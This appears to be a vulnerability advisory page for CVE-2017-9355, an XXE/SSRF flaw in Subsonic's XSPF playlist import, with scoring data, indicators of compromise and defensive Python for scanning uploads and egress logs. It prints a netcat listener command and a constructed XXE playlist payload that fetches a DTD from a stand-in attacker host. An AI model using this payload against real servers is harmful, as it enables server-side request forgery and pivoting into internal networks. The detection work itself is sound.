CVE-2017-9355
published 2017-06-07


Priority: P2 · 60 · high · CVSS 3.0: 7.4
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
Exploit: available
EPSS: 26.91% (97.8th percentile)
XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted XSPF playlist file.

Affected (1 range)

Vendor    Product    Version range    Fixed in
subsonic  subsonic   (not stated)     (not stated)

Detection & IOCs (extracted from sources)

  • filename: RainbowsNUnic0rns.xspf
  • port: 1337
  • User-Agent: Java/1.8.0_45
  • command: nc.exe -llvp 1337
  • Monitor HTTP requests to Subsonic's import playlist endpoint for uploads of .xspf files that contain DOCTYPE declarations or ENTITY definitions; a playlist has no legitimate need for either, so their presence indicates an XXE payload.
  • Detect outbound HTTP connections from the Subsonic server process that carry the Java HTTP client User-Agent header (Java/1.8.0_45 in the source material); this is the callback used in XXE/SSRF exploitation of this vulnerability.
  • Alert on inbound XSPF playlist files containing external entity declarations or parameter entity references (%mmmm; or similar) during playlist import.
  • The XXE results in server-side HTTP GET requests that originate from the Subsonic host and go to attacker-controlled or internal network targets; monitor for unexpected outbound GET requests with Java HTTP client headers from the media server.
  • Exploitation requires user interaction: a user must be socially engineered into importing the malicious .xspf playlist through the Subsonic UI.
  • The XXE/SSRF vector can be used to pivot to internal hosts behind a firewall, not only to external internet targets, so the blast radius extends beyond the Subsonic server itself.
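The detection notes above describe two checks: inspecting uploaded XSPF playlists for DOCTYPE/ENTITY markup before a parser touches them, and flagging egress from the media server that carries a Java HTTP client User-Agent. The following Python is an added example written for this page, not code from Subsonic or from the advisory's sources. The playlists, the egress log lines, the attacker hostname attacker.example and the media-server address 10.0.0.7 are constructed for illustration; only the port 1337, the .xspf upload and the Java/1.8.0_45 User-Agent come from the page's IOCs. The internal/external classification is a plain RFC 1918 check, which is an assumption about what "internal" means in a given network.

```python
import re
import ipaddress
from typing import Dict, List, Set

# Constructed sample playlists (not from the advisory).
BENIGN_XSPF = """<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
  <trackList>
    <track><location>file:///music/track01.mp3</location></track>
  </trackList>
</playlist>
"""

# Constructed XXE payload of the shape the detection notes describe:
# an external parameter entity fetched from the attacker's listener.
# attacker.example is an assumption; port 1337 is the page's IOC.
MALICIOUS_XSPF = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE playlist [
  <!ENTITY % mmmm SYSTEM "http://attacker.example:1337/oob.dtd">
  %mmmm;
]>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
  <trackList/>
</playlist>
"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External entity declaration: <!ENTITY [%] name SYSTEM|PUBLIC ...>
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([A-Za-z_][\w.-]*)\s+(SYSTEM|PUBLIC)\b[^>]*>", re.IGNORECASE
)
# Parameter entity reference such as %mmmm;
PARAM_REF_RE = re.compile(r"%[A-Za-z_][\w.-]*;")


def scan_xspf(text: str) -> Dict[str, object]:
    """Return XXE indicators found in an XSPF upload, before any XML parser sees it."""
    findings: Dict[str, object] = {
        "doctype": bool(DOCTYPE_RE.search(text)),
        "external_entities": [m.group(2) for m in ENTITY_RE.finditer(text)],
        "parameter_entity_refs": PARAM_REF_RE.findall(text),
    }
    findings["suspicious"] = (
        findings["doctype"]
        or bool(findings["external_entities"])
        or bool(findings["parameter_entity_refs"])
    )
    return findings


# Constructed egress-proxy log (assumed format, not a real product's log).
# 10.0.0.7 is the assumed Subsonic host; the Java UA value is the page's IOC.
PROXY_LOG = """\
2017-06-07T10:01:02Z src=10.0.0.5 dst=10.0.0.10:80 method=GET path=/ ua="Mozilla/5.0"
2017-06-07T10:01:05Z src=10.0.0.7 dst=203.0.113.9:1337 method=GET path=/oob.dtd ua="Java/1.8.0_45"
2017-06-07T10:01:06Z src=10.0.0.7 dst=10.0.0.20:8080 method=GET path=/admin ua="Java/1.8.0_45"
2017-06-07T10:02:00Z src=10.0.0.7 dst=10.0.0.30:443 method=POST path=/api ua="Java/1.8.0_45"
"""

LOG_RE = re.compile(
    r'src=(?P<src>\S+) dst=(?P<dst>[^:\s]+):(?P<port>\d+) '
    r'method=(?P<method>\S+) path=(?P<path>\S+) ua="(?P<ua>[^"]*)"'
)

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def flag_java_egress(log: str, media_servers: Set[str]) -> List[Dict[str, object]]:
    """Flag outbound GETs from the media server(s) that carry a Java HTTP client UA.

    Each hit records whether the destination is an internal (RFC 1918) host,
    which distinguishes an OOB callback from a pivot into the internal network.
    """
    hits: List[Dict[str, object]] = []
    for line in log.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        f = m.groupdict()
        if f["src"] not in media_servers or f["method"] != "GET":
            continue
        if not f["ua"].startswith("Java/"):
            continue
        hits.append({
            "dst": f["dst"],
            "port": int(f["port"]),
            "path": f["path"],
            "internal": is_rfc1918(f["dst"]),
        })
    return hits
```

On the sample data the scanner flags only the DOCTYPE-bearing playlist, and the egress check yields two hits from the media server: the out-of-band fetch to the listener on port 1337 and a GET to an internal host, which is the pivot the last note warns about. The POST line is left alone because the vector in the sources is GET only; broaden the method filter if your environment sees other shapes.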

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.0     7.4    HIGH      CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
nvd     v2.0     4.3    MEDIUM    AV:N/AC:M/Au:N/C:N/I:P/A:N